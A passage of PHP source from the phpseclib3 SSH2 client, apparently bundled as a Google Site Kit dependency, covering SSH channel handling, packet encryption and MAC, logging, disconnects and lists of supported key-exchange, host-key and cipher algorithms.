NET_SSH2_MSG_GLOBAL_REQUEST: // see http://tools.ietf.org/html/rfc4254#section-4 \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($payload, 1); list($request_name) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $payload); $this->errors[] = "SSH_MSG_GLOBAL_REQUEST: {$request_name}"; $this->send_binary_packet(\pack('C', NET_SSH2_MSG_REQUEST_FAILURE)); $payload = $this->get_binary_packet(); break; case NET_SSH2_MSG_CHANNEL_OPEN: // see http://tools.ietf.org/html/rfc4254#section-5.1 \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($payload, 1); list($data, $server_channel) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('sN', $payload); switch ($data) { case 'auth-agent': case 'auth-agent@openssh.com': if (isset($this->agent)) { $new_channel = self::CHANNEL_AGENT_FORWARD; list($remote_window_size, $remote_maximum_packet_size) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('NN', $payload); $this->packet_size_client_to_server[$new_channel] = $remote_window_size; $this->window_size_server_to_client[$new_channel] = $remote_maximum_packet_size; $this->window_size_client_to_server[$new_channel] = $this->window_size; $packet_size = 0x4000; $packet = \pack('CN4', NET_SSH2_MSG_CHANNEL_OPEN_CONFIRMATION, $server_channel, $new_channel, $packet_size, $packet_size); $this->server_channels[$new_channel] = $server_channel; $this->channel_status[$new_channel] = NET_SSH2_MSG_CHANNEL_OPEN_CONFIRMATION; $this->send_binary_packet($packet); } break; default: $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2( 'CN2ss', NET_SSH2_MSG_CHANNEL_OPEN_FAILURE, $server_channel, NET_SSH2_OPEN_ADMINISTRATIVELY_PROHIBITED, '', // description '' ); $this->send_binary_packet($packet); } $payload = $this->get_binary_packet(); break; } } return $payload; } /** * Enable Quiet Mode * * Suppress stderr from output * */ public function enableQuietMode() { $this->quiet_mode = \true; } /** * Disable Quiet Mode * * Show stderr in output * */ public function disableQuietMode() { $this->quiet_mode = \false; } /** * Returns whether Quiet Mode is enabled or not * * @see self::enableQuietMode() * @see self::disableQuietMode() * @return bool */ public function isQuietModeEnabled() { return $this->quiet_mode; } /** * Enable request-pty when using exec() * */ public function enablePTY() { $this->request_pty = \true; } /** * Disable request-pty when using exec() * */ public function disablePTY() { if ($this->isPTYOpen()) { $this->close_channel(self::CHANNEL_EXEC); } $this->request_pty = \false; } /** * Returns whether request-pty is enabled or not * * @see self::enablePTY() * @see self::disablePTY() * @return bool */ public function isPTYEnabled() { return $this->request_pty; } /** * Gets channel data * * Returns the data as a string. bool(true) is returned if: * * - the server closes the channel * - if the connection times out * - if a window adjust packet is received on the given negated client channel * - if the channel status is CHANNEL_OPEN and the response was CHANNEL_OPEN_CONFIRMATION * - if the channel status is CHANNEL_REQUEST and the response was CHANNEL_SUCCESS * - if the channel status is CHANNEL_CLOSE and the response was CHANNEL_CLOSE * * bool(false) is returned if: * * - if the channel status is CHANNEL_REQUEST and the response was CHANNEL_FAILURE * * @param int $client_channel Specifies the channel to return data for, and data received * on other channels is buffered. The respective negative value of a channel is * also supported for the case that the caller is awaiting adjustment of the data * window, and where data received on that respective channel is also buffered. * @param bool $skip_extended * @return mixed * @throws \RuntimeException on connection error */ protected function get_channel_packet($client_channel, $skip_extended = \false) { if (!empty($this->channel_buffers[$client_channel])) { switch ($this->channel_status[$client_channel]) { case NET_SSH2_MSG_CHANNEL_REQUEST: foreach ($this->channel_buffers[$client_channel] as $i => $packet) { switch (\ord($packet[0])) { case NET_SSH2_MSG_CHANNEL_SUCCESS: case NET_SSH2_MSG_CHANNEL_FAILURE: unset($this->channel_buffers[$client_channel][$i]); return \substr($packet, 1); } } break; default: return \substr(\array_shift($this->channel_buffers[$client_channel]), 1); } } while (\true) { try { $response = $this->get_binary_packet(); } catch (\Google\Site_Kit_Dependencies\phpseclib3\Exception\TimeoutException $e) { return \true; } list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('C', $response); if (\strlen($response) >= 4) { list($channel) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); } // will not be setup yet on incoming channel open request if (isset($channel) && isset($this->channel_status[$channel]) && isset($this->window_size_server_to_client[$channel])) { $this->window_size_server_to_client[$channel] -= \strlen($response); // resize the window, if appropriate if ($this->window_size_server_to_client[$channel] < 0) { // PuTTY does something more analogous to the following: //if ($this->window_size_server_to_client[$channel] < 0x3FFFFFFF) { $packet = \pack('CNN', NET_SSH2_MSG_CHANNEL_WINDOW_ADJUST, $this->server_channels[$channel], $this->window_resize); $this->send_binary_packet($packet); $this->window_size_server_to_client[$channel] += $this->window_resize; } switch ($type) { case NET_SSH2_MSG_CHANNEL_WINDOW_ADJUST: list($window_size) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); $this->window_size_client_to_server[$channel] += $window_size; if ($channel == -$client_channel) { return \true; } continue 2; case NET_SSH2_MSG_CHANNEL_EXTENDED_DATA: /* if ($client_channel == self::CHANNEL_EXEC) { $this->send_channel_packet($client_channel, chr(0)); } */ // currently, there's only one possible value for $data_type_code: NET_SSH2_EXTENDED_DATA_STDERR list($data_type_code, $data) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Ns', $response); $this->stdErrorLog .= $data; if ($skip_extended || $this->quiet_mode) { continue 2; } if ($client_channel == $channel && $this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_DATA) { return $data; } $this->channel_buffers[$channel][] = \chr($type) . $data; continue 2; case NET_SSH2_MSG_CHANNEL_REQUEST: if ($this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_CLOSE) { continue 2; } list($value) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); switch ($value) { case 'exit-signal': list(, $signal_name, , $error_message) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('bsbs', $response); $this->errors[] = "SSH_MSG_CHANNEL_REQUEST (exit-signal): {$signal_name}"; if (\strlen($error_message)) { $this->errors[\count($this->errors) - 1] .= "\r\n{$error_message}"; } $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_CHANNEL_EOF, $this->server_channels[$client_channel])); $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_CHANNEL_CLOSE, $this->server_channels[$channel])); $this->channel_status[$channel] = NET_SSH2_MSG_CHANNEL_EOF; continue 3; case 'exit-status': list(, $this->exit_status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('CN', $response); // "The client MAY ignore these messages." // -- http://tools.ietf.org/html/rfc4254#section-6.10 continue 3; default: // "Some systems may not implement signals, in which case they SHOULD ignore this message." // -- http://tools.ietf.org/html/rfc4254#section-6.9 continue 3; } } switch ($this->channel_status[$channel]) { case NET_SSH2_MSG_CHANNEL_OPEN: switch ($type) { case NET_SSH2_MSG_CHANNEL_OPEN_CONFIRMATION: list($this->server_channels[$channel], $window_size, $this->packet_size_client_to_server[$channel]) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('NNN', $response); if ($window_size < 0) { $window_size &= 0x7fffffff; $window_size += 0x80000000; } $this->window_size_client_to_server[$channel] = $window_size; $result = $client_channel == $channel ? \true : $this->get_channel_packet($client_channel, $skip_extended); $this->on_channel_open(); return $result; case NET_SSH2_MSG_CHANNEL_OPEN_FAILURE: $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException('Unable to open channel'); default: if ($client_channel == $channel) { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException('Unexpected response to open request'); } return $this->get_channel_packet($client_channel, $skip_extended); } break; case NET_SSH2_MSG_CHANNEL_REQUEST: switch ($type) { case NET_SSH2_MSG_CHANNEL_SUCCESS: return \true; case NET_SSH2_MSG_CHANNEL_FAILURE: return \false; case NET_SSH2_MSG_CHANNEL_DATA: list($data) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); $this->channel_buffers[$channel][] = \chr($type) . $data; return $this->get_channel_packet($client_channel, $skip_extended); default: $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException('Unable to fulfill channel request'); } case NET_SSH2_MSG_CHANNEL_CLOSE: if ($client_channel == $channel && $type == NET_SSH2_MSG_CHANNEL_CLOSE) { return \true; } return $this->get_channel_packet($client_channel, $skip_extended); } } // ie. $this->channel_status[$channel] == NET_SSH2_MSG_CHANNEL_DATA switch ($type) { case NET_SSH2_MSG_CHANNEL_DATA: /* if ($channel == self::CHANNEL_EXEC) { // SCP requires null packets, such as this, be sent. further, in the case of the ssh.com SSH server // this actually seems to make things twice as fast. more to the point, the message right after // SSH_MSG_CHANNEL_DATA (usually SSH_MSG_IGNORE) won't block for as long as it would have otherwise. // in OpenSSH it slows things down but only by a couple thousandths of a second. $this->send_channel_packet($channel, chr(0)); } */ list($data) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); if ($channel == self::CHANNEL_AGENT_FORWARD) { $agent_response = $this->agent->forwardData($data); if (!\is_bool($agent_response)) { $this->send_channel_packet($channel, $agent_response); } break; } if ($client_channel == $channel) { return $data; } $this->channel_buffers[$channel][] = \chr($type) . $data; break; case NET_SSH2_MSG_CHANNEL_CLOSE: $this->curTimeout = 5; $this->close_channel_bitmap($channel); if ($this->channel_status[$channel] != NET_SSH2_MSG_CHANNEL_EOF) { $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_CHANNEL_CLOSE, $this->server_channels[$channel])); } $this->channel_status[$channel] = NET_SSH2_MSG_CHANNEL_CLOSE; $this->channelCount--; if ($client_channel == $channel) { return \true; } // fall-through case NET_SSH2_MSG_CHANNEL_EOF: break; default: $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); throw new \RuntimeException("Error reading channel data ({$type})"); } } } /** * Sends Binary Packets * * See '6. Binary Packet Protocol' of rfc4253 for more info. * * @param string $data * @param string $logged * @see self::_get_binary_packet() * @return void */ protected function send_binary_packet($data, $logged = null) { if (!\is_resource($this->fsock) || \feof($this->fsock)) { $this->disconnect_helper(NET_SSH2_DISCONNECT_CONNECTION_LOST); throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\ConnectionClosedException('Connection closed prematurely'); } if (!isset($logged)) { $logged = $data; } switch ($this->compress) { case self::NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH: if (!$this->isAuthenticated()) { break; } // fall-through case self::NET_SSH2_COMPRESSION_ZLIB: if (!$this->regenerate_compression_context) { $header = ''; } else { $this->regenerate_compression_context = \false; $this->compress_context = \deflate_init(\ZLIB_ENCODING_RAW, ['window' => 15]); $header = "x\x9c"; } if ($this->compress_context) { $data = $header . \deflate_add($this->compress_context, $data, \ZLIB_PARTIAL_FLUSH); } } // 4 (packet length) + 1 (padding length) + 4 (minimal padding amount) == 9 $packet_length = \strlen($data) + 9; if ($this->encrypt && $this->encrypt->usesNonce()) { $packet_length -= 4; } // round up to the nearest $this->encrypt_block_size $packet_length += ($this->encrypt_block_size - 1) * $packet_length % $this->encrypt_block_size; // subtracting strlen($data) is obvious - subtracting 5 is necessary because of packet_length and padding_length $padding_length = $packet_length - \strlen($data) - 5; switch (\true) { case $this->encrypt && $this->encrypt->usesNonce(): case $this->hmac_create instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash && $this->hmac_create_etm: $padding_length += 4; $packet_length += 4; } $padding = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random::string($padding_length); // we subtract 4 from packet_length because the packet_length field isn't supposed to include itself $packet = \pack('NCa*', $packet_length - 4, $padding_length, $data . $padding); $hmac = ''; if ($this->hmac_create instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash && !$this->hmac_create_etm) { if (($this->hmac_create->getHash() & "\xff\xff\xff\xff") == 'umac') { $this->hmac_create->setNonce("\x00\x00\x00\x00" . \pack('N', $this->send_seq_no)); $hmac = $this->hmac_create->hash($packet); } else { $hmac = $this->hmac_create->hash(\pack('Na*', $this->send_seq_no, $packet)); } } if ($this->encrypt) { switch ($this->encryptName) { case 'aes128-gcm@openssh.com': case 'aes256-gcm@openssh.com': $this->encrypt->setNonce($this->encryptFixedPart . $this->encryptInvocationCounter); \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::increment_str($this->encryptInvocationCounter); $this->encrypt->setAAD($temp = $packet & "\xff\xff\xff\xff"); $packet = $temp . $this->encrypt->encrypt(\substr($packet, 4)); break; case 'chacha20-poly1305@openssh.com': // This should be impossible, but we are checking anyway to narrow the type for Psalm. if (!$this->encrypt instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\ChaCha20) { throw new \LogicException('$this->encrypt is not a ' . \Google\Site_Kit_Dependencies\phpseclib3\Crypt\ChaCha20::class); } $nonce = \pack('N2', 0, $this->send_seq_no); $this->encrypt->setNonce($nonce); $this->lengthEncrypt->setNonce($nonce); $length = $this->lengthEncrypt->encrypt($packet & "\xff\xff\xff\xff"); $this->encrypt->setCounter(0); // this is the same approach that's implemented in Salsa20::createPoly1305Key() // but we don't want to use the same AEAD construction that RFC8439 describes // for ChaCha20-Poly1305 so we won't rely on it (see Salsa20::poly1305()) $this->encrypt->setPoly1305Key($this->encrypt->encrypt(\str_repeat("\x00", 32))); $this->encrypt->setAAD($length); $this->encrypt->setCounter(1); $packet = $length . $this->encrypt->encrypt(\substr($packet, 4)); break; default: $packet = $this->hmac_create instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash && $this->hmac_create_etm ? ($packet & "\xff\xff\xff\xff") . $this->encrypt->encrypt(\substr($packet, 4)) : $this->encrypt->encrypt($packet); } } if ($this->hmac_create instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Hash && $this->hmac_create_etm) { if (($this->hmac_create->getHash() & "\xff\xff\xff\xff") == 'umac') { $this->hmac_create->setNonce("\x00\x00\x00\x00" . \pack('N', $this->send_seq_no)); $hmac = $this->hmac_create->hash($packet); } else { $hmac = $this->hmac_create->hash(\pack('Na*', $this->send_seq_no, $packet)); } } $this->send_seq_no++; $packet .= $this->encrypt && $this->encrypt->usesNonce() ? $this->encrypt->getTag() : $hmac; if (!$this->keyExchangeInProgress) { $this->bytesTransferredSinceLastKEX += \strlen($packet); } $start = \microtime(\true); $sent = @\fputs($this->fsock, $packet); $stop = \microtime(\true); if (\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING')) { $current = \microtime(\true); $message_number = isset(self::$message_numbers[\ord($logged[0])]) ? self::$message_numbers[\ord($logged[0])] : 'UNKNOWN (' . \ord($logged[0]) . ')'; $message_number = '-> ' . $message_number . ' (since last: ' . \round($current - $this->last_packet, 4) . ', network: ' . \round($stop - $start, 4) . 's)'; $this->append_log($message_number, $logged); } $this->last_packet = \microtime(\true); if (\strlen($packet) != $sent) { $this->disconnect_helper(NET_SSH2_DISCONNECT_BY_APPLICATION); $message = $sent === \false ? 'Unable to write ' . \strlen($packet) . ' bytes' : "Only {$sent} of " . \strlen($packet) . " bytes were sent"; throw new \RuntimeException($message); } if ($this->bytesTransferredSinceLastKEX > $this->doKeyReexchangeAfterXBytes) { $this->key_exchange(); } } /** * Sends a keep-alive message, if keep-alive is enabled and interval is met */ private function send_keep_alive() { if ($this->bitmap & self::MASK_CONNECTED) { $elapsed = \microtime(\true) - $this->last_packet; if ($this->keepAlive > 0 && $elapsed >= $this->keepAlive) { $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_IGNORE, 0)); } } } /** * Logs data packets * * Makes sure that only the last 1MB worth of packets will be logged * * @param string $message_number * @param string $message */ private function append_log($message_number, $message) { $this->append_log_helper(NET_SSH2_LOGGING, $message_number, $message, $this->message_number_log, $this->message_log, $this->log_size, $this->realtime_log_file, $this->realtime_log_wrap, $this->realtime_log_size); } /** * Logs data packet helper * * @param int $constant * @param string $message_number * @param string $message * @param array &$message_number_log * @param array &$message_log * @param int &$log_size * @param resource &$realtime_log_file * @param bool &$realtime_log_wrap * @param int &$realtime_log_size */ protected function append_log_helper($constant, $message_number, $message, array &$message_number_log, array &$message_log, &$log_size, &$realtime_log_file, &$realtime_log_wrap, &$realtime_log_size) { // remove the byte identifying the message type from all but the first two messages (ie. the identification strings) if (\strlen($message_number) > 2) { \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($message); } switch ($constant) { // useful for benchmarks case self::LOG_SIMPLE: $message_number_log[] = $message_number; break; case self::LOG_SIMPLE_REALTIME: echo $message_number; echo \PHP_SAPI == 'cli' ? "\r\n" : '<br>'; @\flush(); @\ob_flush(); break; // the most useful log for SSH2 case self::LOG_COMPLEX: $message_number_log[] = $message_number; $log_size += \strlen($message); $message_log[] = $message; while ($log_size > self::LOG_MAX_SIZE) { $log_size -= \strlen(\array_shift($message_log)); \array_shift($message_number_log); } break; // dump the output out realtime; packets may be interspersed with non packets, // passwords won't be filtered out and select other packets may not be correctly // identified case self::LOG_REALTIME: switch (\PHP_SAPI) { case 'cli': $start = $stop = "\r\n"; break; default: $start = '<pre>'; $stop = '</pre>'; } echo $start . $this->format_log([$message], [$message_number]) . $stop; @\flush(); @\ob_flush(); break; // basically the same thing as self::LOG_REALTIME with the caveat that NET_SSH2_LOG_REALTIME_FILENAME // needs to be defined and that the resultant log file will be capped out at self::LOG_MAX_SIZE. // the earliest part of the log file is denoted by the first <<< START >>> and is not going to necessarily // at the beginning of the file case self::LOG_REALTIME_FILE: if (!isset($realtime_log_file)) { // PHP doesn't seem to like using constants in fopen() $filename = NET_SSH2_LOG_REALTIME_FILENAME; $fp = \fopen($filename, 'w'); $realtime_log_file = $fp; } if (!\is_resource($realtime_log_file)) { break; } $entry = $this->format_log([$message], [$message_number]); if ($realtime_log_wrap) { $temp = "<<< START >>>\r\n"; $entry .= $temp; \fseek($realtime_log_file, \ftell($realtime_log_file) - \strlen($temp)); } $realtime_log_size += \strlen($entry); if ($realtime_log_size > self::LOG_MAX_SIZE) { \fseek($realtime_log_file, 0); $realtime_log_size = \strlen($entry); $realtime_log_wrap = \true; } \fputs($realtime_log_file, $entry); break; case self::LOG_REALTIME_SIMPLE: echo $message_number; echo \PHP_SAPI == 'cli' ? "\r\n" : '<br>'; } } /** * Sends channel data * * Spans multiple SSH_MSG_CHANNEL_DATAs if appropriate * * @param int $client_channel * @param string $data * @return void */ protected function send_channel_packet($client_channel, $data) { if (isset($this->channel_buffers_write[$client_channel]) && \strpos($data, $this->channel_buffers_write[$client_channel]) === 0) { // if buffer holds identical initial data content, resume send from the unmatched data portion $data = \substr($data, \strlen($this->channel_buffers_write[$client_channel])); } else { $this->channel_buffers_write[$client_channel] = ''; } while (\strlen($data)) { if (!$this->window_size_client_to_server[$client_channel]) { // using an invalid channel will let the buffers be built up for the valid channels $this->get_channel_packet(-$client_channel); if ($this->isTimeout()) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\TimeoutException('Timed out waiting for server'); } elseif (!$this->window_size_client_to_server[$client_channel]) { throw new \RuntimeException('Data window was not adjusted'); } } /* The maximum amount of data allowed is determined by the maximum packet size for the channel, and the current window size, whichever is smaller. -- http://tools.ietf.org/html/rfc4254#section-5.2 */ $max_size = \min($this->packet_size_client_to_server[$client_channel], $this->window_size_client_to_server[$client_channel]); $temp = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($data, $max_size); $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNs', NET_SSH2_MSG_CHANNEL_DATA, $this->server_channels[$client_channel], $temp); $this->window_size_client_to_server[$client_channel] -= \strlen($temp); $this->send_binary_packet($packet); $this->channel_buffers_write[$client_channel] .= $temp; } unset($this->channel_buffers_write[$client_channel]); } /** * Closes and flushes a channel * * \phpseclib3\Net\SSH2 doesn't properly close most channels. For exec() channels are normally closed by the server * and for SFTP channels are presumably closed when the client disconnects. This functions is intended * for SCP more than anything. * * @param int $client_channel * @param bool $want_reply * @return void */ private function close_channel($client_channel, $want_reply = \false) { // see http://tools.ietf.org/html/rfc4254#section-5.3 $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_CHANNEL_EOF, $this->server_channels[$client_channel])); if (!$want_reply) { $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_CHANNEL_CLOSE, $this->server_channels[$client_channel])); } $this->channel_status[$client_channel] = NET_SSH2_MSG_CHANNEL_CLOSE; $this->channelCount--; $this->curTimeout = 5; while (!\is_bool($this->get_channel_packet($client_channel))) { } if ($want_reply) { $this->send_binary_packet(\pack('CN', NET_SSH2_MSG_CHANNEL_CLOSE, $this->server_channels[$client_channel])); } $this->close_channel_bitmap($client_channel); } /** * Maintains execution state bitmap in response to channel closure * * @param int $client_channel The channel number to maintain closure status of * @return void */ private function close_channel_bitmap($client_channel) { switch ($client_channel) { case self::CHANNEL_SHELL: // Shell status has been maintained in the bitmap for backwards // compatibility sake, but can be removed going forward if ($this->bitmap & self::MASK_SHELL) { $this->bitmap &= ~self::MASK_SHELL; } break; } } /** * Disconnect * * @param int $reason * @return false */ protected function disconnect_helper($reason) { if ($this->bitmap & self::MASK_DISCONNECT) { // Disregard subsequent disconnect requests return \false; } $this->bitmap |= self::MASK_DISCONNECT; if ($this->isConnected()) { $data = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNss', NET_SSH2_MSG_DISCONNECT, $reason, '', ''); try { $this->send_binary_packet($data); } catch (\Exception $e) { } } $this->reset_connection(); return \false; } /** * Define Array * * Takes any number of arrays whose indices are integers and whose values are strings and defines a bunch of * named constants from it, using the value as the name of the constant and the index as the value of the constant. * If any of the constants that would be defined already exists, none of the constants will be defined. * * @param mixed[] ...$args * @access protected */ protected static function define_array(...$args) { foreach ($args as $arg) { foreach ($arg as $key => $value) { if (!\defined($value)) { \define($value, $key); } else { break 2; } } } } /** * Returns a log of the packets that have been sent and received. * * Returns a string if NET_SSH2_LOGGING == self::LOG_COMPLEX, an array if NET_SSH2_LOGGING == self::LOG_SIMPLE and false if !defined('NET_SSH2_LOGGING') * * @return array|false|string */ public function getLog() { if (!\defined('Google\\Site_Kit_Dependencies\\NET_SSH2_LOGGING')) { return \false; } switch (NET_SSH2_LOGGING) { case self::LOG_SIMPLE: return $this->message_number_log; case self::LOG_COMPLEX: $log = $this->format_log($this->message_log, $this->message_number_log); return \PHP_SAPI == 'cli' ? $log : '<pre>' . $log . '</pre>'; default: return \false; } } /** * Formats a log for printing * * @param array $message_log * @param array $message_number_log * @return string */ protected function format_log(array $message_log, array $message_number_log) { $output = ''; for ($i = 0; $i < \count($message_log); $i++) { $output .= $message_number_log[$i]; $current_log = $message_log[$i]; $j = 0; if (\strlen($current_log)) { $output .= "\r\n"; } do { if (\strlen($current_log)) { $output .= \str_pad(\dechex($j), 7, '0', \STR_PAD_LEFT) . '0 '; } $fragment = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($current_log, $this->log_short_width); $hex = \substr(\preg_replace_callback('#.#s', function ($matches) { return $this->log_boundary . \str_pad(\dechex(\ord($matches[0])), 2, '0', \STR_PAD_LEFT); }, $fragment), \strlen($this->log_boundary)); // replace non ASCII printable characters with dots // http://en.wikipedia.org/wiki/ASCII#ASCII_printable_characters // also replace < with a . since < messes up the output on web browsers $raw = \preg_replace('#[^\\x20-\\x7E]|<#', '.', $fragment); $output .= \str_pad($hex, $this->log_long_width - $this->log_short_width, ' ') . $raw . "\r\n"; $j++; } while (\strlen($current_log)); $output .= "\r\n"; } return $output; } /** * Helper function for agent->on_channel_open() * * Used when channels are created to inform agent * of said channel opening. Must be called after * channel open confirmation received * */ private function on_channel_open() { if (isset($this->agent)) { $this->agent->registerChannelOpen($this); } } /** * Returns the first value of the intersection of two arrays or false if * the intersection is empty. The order is defined by the first parameter. * * @param array $array1 * @param array $array2 * @return mixed False if intersection is empty, else intersected value. */ private static function array_intersect_first(array $array1, array $array2) { foreach ($array1 as $value) { if (\in_array($value, $array2)) { return $value; } } return \false; } /** * Returns all errors / debug messages on the SSH layer * * If you are looking for messages from the SFTP layer, please see SFTP::getSFTPErrors() * * @return string[] */ public function getErrors() { return $this->errors; } /** * Returns the last error received on the SSH layer * * If you are looking for messages from the SFTP layer, please see SFTP::getLastSFTPError() * * @return string */ public function getLastError() { $count = \count($this->errors); if ($count > 0) { return $this->errors[$count - 1]; } } /** * Return the server identification. * * @return string|false */ public function getServerIdentification() { $this->connect(); return $this->server_identifier; } /** * Returns a list of algorithms the server supports * * @return array */ public function getServerAlgorithms() { $this->connect(); return ['kex' => $this->kex_algorithms, 'hostkey' => $this->server_host_key_algorithms, 'client_to_server' => ['crypt' => $this->encryption_algorithms_client_to_server, 'mac' => $this->mac_algorithms_client_to_server, 'comp' => $this->compression_algorithms_client_to_server, 'lang' => $this->languages_client_to_server], 'server_to_client' => ['crypt' => $this->encryption_algorithms_server_to_client, 'mac' => $this->mac_algorithms_server_to_client, 'comp' => $this->compression_algorithms_server_to_client, 'lang' => $this->languages_server_to_client]]; } /** * Returns a list of KEX algorithms that phpseclib supports * * @return array */ public static function getSupportedKEXAlgorithms() { $kex_algorithms = [ // Elliptic Curve Diffie-Hellman Key Agreement (ECDH) using // Curve25519. See doc/curve25519-sha256@libssh.org.txt in the // libssh repository for more information. 'curve25519-sha256', 'curve25519-sha256@libssh.org', 'ecdh-sha2-nistp256', // RFC 5656 'ecdh-sha2-nistp384', // RFC 5656 'ecdh-sha2-nistp521', // RFC 5656 'diffie-hellman-group-exchange-sha256', // RFC 4419 'diffie-hellman-group-exchange-sha1', // RFC 4419 // Diffie-Hellman Key Agreement (DH) using integer modulo prime // groups. 'diffie-hellman-group14-sha256', 'diffie-hellman-group14-sha1', // REQUIRED 'diffie-hellman-group15-sha512', 'diffie-hellman-group16-sha512', 'diffie-hellman-group17-sha512', 'diffie-hellman-group18-sha512', 'diffie-hellman-group1-sha1', ]; return $kex_algorithms; } /** * Returns a list of host key algorithms that phpseclib supports * * @return array */ public static function getSupportedHostKeyAlgorithms() { return [ 'ssh-ed25519', // https://tools.ietf.org/html/draft-ietf-curdle-ssh-ed25519-02 'ecdsa-sha2-nistp256', // RFC 5656 'ecdsa-sha2-nistp384', // RFC 5656 'ecdsa-sha2-nistp521', // RFC 5656 'rsa-sha2-256', // RFC 8332 'rsa-sha2-512', // RFC 8332 'ssh-rsa', // RECOMMENDED sign Raw RSA Key 'ssh-dss', ]; } /** * Returns a list of symmetric key algorithms that phpseclib supports * * @return array */ public static function getSupportedEncryptionAlgorithms() { $algos = [ // from <https://tools.ietf.org/html/rfc5647>: 'aes128-gcm@openssh.com', 'aes256-gcm@openssh.com', // from <http://tools.ietf.org/html/rfc4345#section-4>: 'arcfour256', 'arcfour128', //'arcfour', // OPTIONAL the ARCFOUR stream cipher with a 128-bit key // CTR modes from <http://tools.ietf.org/html/rfc4344#section-4>: 'aes128-ctr', // RECOMMENDED AES (Rijndael) in SDCTR mode, with 128-bit key 'aes192-ctr', // RECOMMENDED AES with 192-bit key 'aes256-ctr', // RECOMMENDED AES with 256-bit key // from <https://github.com/openssh/openssh-portable/blob/001aa55/PROTOCOL.chacha20poly1305>: // one of the big benefits of chacha20-poly1305 is speed. the problem is... // libsodium doesn't generate the poly1305 keys in the way ssh does and openssl's PHP bindings don't even // seem to support poly1305 currently. so even if libsodium or openssl are being used for the chacha20 // part, pure-PHP has to be used for the poly1305 part and that's gonna cause a big slow down. // speed-wise it winds up being faster to use AES (when openssl or mcrypt are available) and some HMAC // (which is always gonna be super fast to compute thanks to the hash extension, which // "is bundled and compiled into PHP by default") 'chacha20-poly1305@openssh.com', 'twofish128-ctr', // OPTIONAL Twofish in SDCTR mode, with 128-bit key 'twofish192-ctr', // OPTIONAL Twofish with 192-bit key 'twofish256-ctr', // OPTIONAL Twofish with 256-bit key 'aes128-cbc', // RECOMMENDED AES with a 128-bit key 'aes192-cbc', // OPTIONAL AES with a 192-bit key 'aes256-cbc', // OPTIONAL AES in CBC mode, with a 256-bit key 'twofish128-cbc', // OPTIONAL Twofish with a 128-bit key 'twofish192-cbc', // OPTIONAL Twofish with a 192-bit key 'twofish256-cbc', 'twofish-cbc', // OPTIONAL alias for "twofish256-cbc" // (this is being retained for historical reasons) 'blowfish-ctr', // OPTIONAL Blowfish in SDCTR mode 'blowfish-cbc', // OPTIONAL Blowfish in CBC mode '3des-ctr', // RECOMMENDED Three-key 3DES in SDCTR mode '3des-cbc', ]; if (self::$crypto_engine) { $engines = [self::$crypto_engine]; } else { $engines = ['libsodium', 'OpenSSL (GCM)', 'OpenSSL', 'mcrypt', 'Eval', 'PHP']; } $ciphers = []; foreach ($engines as $engine) { foreach ($algos as $algo) { $obj = self::encryption_algorithm_to_crypt_instance($algo); if ($obj instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Rijndael) { $obj->setKeyLength(\preg_replace('#[^\\d]#', '', $algo)); } switch ($algo) { // Eval engines do not exist for ChaCha20 or RC4 because they would not benefit from one. // to benefit from an Eval engine they'd need to loop a variable amount of times, they'd // need to do table lookups (eg. sbox subsitutions). ChaCha20 doesn't do either because // it's a so-called ARX cipher, meaning that the only operations it does are add (A), rotate (R) // and XOR (X). RC4 does do table lookups but being a stream cipher it works differently than // block ciphers. with RC4 you XOR the plaintext against a keystream and the keystream changes // as you encrypt stuff. the only table lookups are made against this keystream and thus table // lookups are kinda unavoidable. with 